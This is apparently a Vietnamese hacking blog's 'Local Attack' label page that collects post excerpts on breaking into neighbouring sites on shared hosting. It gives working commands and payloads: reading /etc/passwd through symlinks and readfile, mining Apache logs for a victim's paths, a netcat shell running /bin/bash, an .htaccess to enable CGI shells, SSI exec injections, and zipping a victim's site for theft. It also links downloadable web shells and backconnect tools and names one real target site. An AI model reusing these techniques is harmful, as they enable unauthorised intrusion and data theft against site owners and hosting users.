Hiển thị các bài đăng có nhãn Local Attack. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Local Attack. Hiển thị tất cả bài đăng

Thứ Năm, 29 tháng 8, 2013

Có User + Pass Data trong tay ? Nhưng bạn chưa làm được gì ????

_Trong loạt bài share này mình sẽ hướng dẫn bà toan cách sử lý khi trong tay có những cái mà quan trọng sau mà không biết ứng sử và sử lý nó ra sao
Đọc Thêm

Thứ Hai, 26 tháng 8, 2013

Sym root bypass open port nếu server cho chạy python

Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.
Đọc Thêm

Hướng dẫn tổng hợp, chi tiết cơ bản nhất các bước để local một victim.

Bài viết này dựa trên kinh nghiệm cũng như những kiến thức mà mình thấy cần thiết nhất và dễ hiểu nhất để dành cho những bạn nào chưa biết đến Local sau khi đọc xong sẽ biết đến nó và có thể thực hành ở đa số các trường hợp.
Đọc Thêm

Tổng hợp những lệnh trên shell hay dùng nhất khi local

1) Xem list domain & user trên cùng sever
Code:
directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com

cd/etc/vdomainaliases;ls-lia
Trường hợp đặc biệt khi không thể xem us
Đọc Thêm

Thứ Năm, 18 tháng 4, 2013

Thứ Hai, 4 tháng 2, 2013

VIdeo local và up shell by pass

http://www.4shared.com/file/79012700/5c813901/Video_local_va_up_shell_bypass.html Đọc Thêm

Thứ Bảy, 1 tháng 12, 2012

[Tutorial]Backconnect with netcat

1.Download

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.Upload nc with shell

[IMG]
3.set chmod 777 for nc



[IMG]
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell


5.open cmd direct to where nc save like this cd c:\
and run this command 
nc -vv [ip target] [port]




[IMG]

6.now you have back connect it

[IMG]
Đọc Thêm

Thứ Năm, 22 tháng 11, 2012

[TUT] Local Cơ bản cho newbie

_Tiếp ngày buồn , bài này chỉ hướng dẫn các NB về cách được gọi là mấy bác nói là "HACK" , ở đây mình chỉ nói đến mức cực cơ bản nhưng chủ yếu là tư duy của các bạn thôi ....

Đọc Thêm

[TUT]Local id apache

Bản tóm tắt này không có sẵn. Vui lòng nhấp vào đây để xem bài đăng. Đọc Thêm

Thứ Bảy, 10 tháng 11, 2012

[Tổng hợp] Shell, NetCut, Symlink, CGI...


Tổng hợp bộ Shell, NetCut, Symlink, CGI... public lên đây cho anh em, đặc biệt là newbie có thêm tools tham khảo để testing.

Download:
http://www.mediafire.com/download.php?jbi4c20wt6haa4w

Pass: 
phimhq.net@vnhack.us


Về cách sử dụng thì trong 4rum cũng có rồi, nếu chưa thạo thì Google search hộ cái nhé. Good luck to you! 
Đọc Thêm

Thứ Năm, 18 tháng 10, 2012

Chuyển Data Sang 1 Sever khác


Mục đích: Chạy 3 site Ex: Guester, GUG , VG-UG ở 3 host khác nhau và dùng chung data của 1 host nào đó.

Công việc rất đơn giản. Chúng ta chỉ cần cấu hình trên host H cho phép IP của 3 host A, B, C kia được phép kết nối đên MySQL Server của nó.- Đăng nhập vào Cpanel --> Remote MySQL.


Chỉnh như dưới đây:



Sau đó khi khai báo Config Database tại 3 host Guester, GUG, VG-UG kia. Thông số hostname các bạn sẽ thay thế localhost bằng IP của host #.


Nguồn : Sưu tầm
Đọc Thêm

Thứ Tư, 17 tháng 10, 2012

Video Upload Shell VBB


[+] video http://www.4shared.com/rar/c05n5a6_/tmtno1.html
[+] shell : http://www.mediafire.com/?y63833jxjppld7s
Đọc Thêm

Thứ Ba, 16 tháng 10, 2012

Tổng hợp TUT local căn bản cho NB


http://www.mediafire.com/?pd10l797f5haw
==================================
Một số tut khác
====================================
Up shell vbb mọi phiên bản (hướng dẫn từ a -gt; z)
http://www.mediafire.com/?gbb3xyhpx2iwoat
pass: tranhoai
====================================
Local hostvn
http://www.mediafire.com/?dhpbve4z1b8gio1
=================================
Tut SQL + up shell +local (tổng hợp)


1.Tìm site lỗi SQL và khai thác
2.Login với quyền admin để up shell
3.Local sang các site khác cùng server
http://www.mediafire.com/?xr10n8nczr8du9q
=================================
Local bằng cách up Cgi-Telnet -


http://www.mediafire.com/download.php?djnmntmgacm
=============================================
Local + Upload shell Joomla chi tiết


http://www.mediafire.com/?3hqep6ku7528vub


pasS: 25071989
==================================
Upload Shell PHPMYADMIN
Link : http://www.mediafire.com/?7rvuy2a62b40k23
Pass : BYG
==================================
một số video khác


http://www.mediafire.com/download.php?tgjd4bnnzdy
http://www.mediafire.com/download.php?ee1ztyyj32n
http://www.mediafire.com/download.php?mwizmitjmmo
http://www.mediafire.com/download.php?iynzjmjjn4y
http://www.mediafire.com/download.php?zjzvenhd1ma
http://www.mediafire.com/download.php?lmq5jlhjxok
http://www.mediafire.com/download.php?jinkzmwmmzy
http://www.mediafire.com/download.php?oimmn2yjnj0
http://www.mediafire.com/download.php?xbonumjzyqz


pass : bocapit

================================================


Local basic
http://www.mediafire.com/?jiki40gwjzx
===========================
Local via sql
http://www.mediafire.com/?w2moq5ygwzy
============================
Tut hướng dẫn chi tiết local thay pass MD5 cho NB
http://www.mediafire.com/?kt4qtkqvma6xusj
=============================
local
http://www.mediafire.com/?lnx6ph8978ljt92
===============================
Vài con shell cần thiết khi local cho anh em!
Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server
http://www.mediafire.com/?45fsa46y5bdobfa

Telnet 1.3
http://www.mediafire.com/?eayxc5k8utpqeig
.htaccess
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg

RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl
~gt; 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về

Admin Finder (tìm thư mục admin)
http://www.mediafire.com/?skaysiedncckx4k

cmd.shtml gt; view source cmd.shtml
lt;!--#exec cmd=quot;dir /home/victim/public_html/quot; --gt;

cmd.shtml (1.txt là file đã được symljnk) gt; view source cmd.shtml
lt;!--#include virtual='1.txt'--gt;

Bypass ln.zip
lt;?php
chmod('ln',0777);
system('./ln -s /etc/passwd gt; 1.txt');
?gt;
hoặc
./ln -s /home/victim/public_html/index.php 1.txt
File SymLink.php
/home/victim/public_html/index.php

Find Path qua error-log : http://victim.com/fuck
tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
tail -100 /usr/local/apache/logs/error_log | grep fuck

Shell offline.php?acc ~gt; get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ
http://www.mediafire.com/?r19m52itzq71x5z

Backuper.php (Leech code)
http://www.mediafire.com/?kp1p40fnwc2171k

Shell Unkonw (Brute)
http://www.mediafire.com/?hvxjzrm1tjgbwmp

Shell images (r57)
http://www.mediafire.com/?lh0nslgadbsb5ab

Shell images (Webadmin)
http://www.mediafire.com/?lc6cizbpw5ijoio

Shell Dumper.php (Zip + Restor data)
http://www.mediafire.com/?9ecl9efdk4mw3hm

Shell images aaa.php.jpg - shell upload
http://www.mediafire.com/i/?d61ubhb1qw11dst

Shell help.php (upload file + chmod)
http://www.mediafire.com/?ytwx6mv4ee2266l

Unzip.php (giải nén các file bị zip)
http://www.mediafire.com/?1bhs7jmvly3e1b4
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
http://www.mediafire.com/?ims0mlwa9e3yzl1

telnet v1.3 (ko cần htaccess)
http://www.mediafire.com/?t1uu3cr6h6aag5c

sym-pl.pl (symljnk cgi ko cần htaccess)
http://www.mediafire.com/?o8fm7bmw90882hq

Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
http://www.mediafire.com/?f86f88nfesduuyp

Locus Shell (back connect)
http://www.mediafire.com/?0vk8v5m8kzcqgvf

perl shell mr.thien (BackConnect)
http://www.mediafire.com/?qedquldy39ilgn9

Ỏ trên là toàn bộ video mình sưu tầm từ web ,blog, post lên cho NB như mình. mong nhân được cái thank từ các bạn.
Đọc Thêm

Chủ Nhật, 7 tháng 10, 2012

Tìm user của victim khi local

Khi local các bạn ít nhiều cũng gặp khó khăn khi tìm path của victim ,bài này mình sẽ chia sẻ 1 chút kinh nghiệm của mình.
Đầu tiên và cũng là cách đơn giản nhất ,đọc file /etc/passwd và đoán user dựa trên domain

cat /etc/passwd

nếu bị server chặn lệnh cat ,bạn thử symlink nó

ln -s /etc/passwd list.txt

hoặc nếu hàm readfile chưa bị disable ,bạn cũng có thể tận dụng nó, tạo 1 file php nội dung như sau

<?php
readfile('/etc/passwd');
?>

Sau đó tiến hành đoán ,user thường giống với domain ,đã loại bỏ kí tự “-” trong domain, đôi khi loại bỏ cả số trong domain.

Cách trên là cơ bản ,nếu domain của victim là domain chính của host ,còn trường hợp là addon domain thì bó tay sao ?
Thử tìm trong logs ,ở đây là error_log ,vào domain victim và tạo ra một error trên trang đó (404 chẳng hạn) rồi tiến hành đọc error_log

tail -1000 /usr/local/apache/logs/error_log

vì các file log này dung lượng rất lớn ,đọc toàn bộ là điểu không khả thi ,chúng ta chỉ cần 1000 dòng cuối cùng trong error_log này ,nó sẽ log cái error mà ta vừa tạo ra trên domain của victim.
Path log trên là khi host dùng cpanel ,đối với directadmin ta có thể tìm được ở /var/log/directadmin/error.log

Trường hợp domain victim dùng mod_rewrite ,tất cả các truy vấn đều hợp lệ thì error_log sẽ không được tạo ra ,thì ta sẽ tiếp tục đọc access_log ,sử dụng lệnh grep để tìm đúng domain mình cần.

grep -i ‘domain.com’ /usr/local/apache/logs/access_log

hoặc lệnh egrep để tìm nhiều domain cùng lúc

egrep -w ‘domain1|domain2|domain3′ /usr/local/apache/logs/access_log

Cuối cùng, cũng là cách mang tính hên xui rất cao nhưng không phải là không được đó là tìm trên google ,search với từ khóa
1

site:domain.com "warning"

và như thế ,bất kì lỗi nào trên website domain.com bị google index đều hiện ra ,và biết đâu trong đó có path của file lỗi ,và thế là ta tìm được user của victim.

Nguồn :Sưu tầm
Đọc Thêm

Chủ Nhật, 23 tháng 9, 2012

Lệnh zip code trên shell

Yêu cầu folder cần zip bằng lệnh chmod default 755 nhé
Command
 zip -r -9 file_name.zip [path]
 vd: zip -r -9 kechocgianvn.zip /home/user/public_html
=> web nó có cái gì thì zip nguyên cả đám. mình thường xài lệnh này

 Tar
tar -cvf file_name.tar [path]

 Gz
tar -zcvf file_name.tar.gz [path]

Trong đó [path] là đường dẫn tới user hoặc folder nhé
Đọc Thêm

Thứ Sáu, 21 tháng 9, 2012

Local bypass ip/~user

Tutorial: http://www.mediafire.com/?k9a8xo26e66ck6b Đọc Thêm

[Video TUT] Up Shell Win Via Bug DNN - Cubi11

www.mediafire.com/?tm1oyua4od1tkeq Đọc Thêm

Hướng đẫn cách lọc USer /etc/passwd

open FILE,"etc.txt"; @user=<FILE>; close(FILE); open FILE,">>kid-BYG.txt"; foreach (@user){ $_=~/(.*):x:/; print FILE $1."\n"; } close(FILE);
Save đoạn code trên kid.pl Tạo 1 file etc.txt copy những gì lấy dc từ etc/passwd bỏ vào . Sau đó run : perl kid.pl . sẽ tạo ra 1 file kid-BYG.txt trong đó có danh sách user
Đọc Thêm

[Tut] Local + up shell lên xsktangiang.com.vn

http://www.mediafire.com/?szdp09eobm6znho Nguồn: VHB Đọc Thêm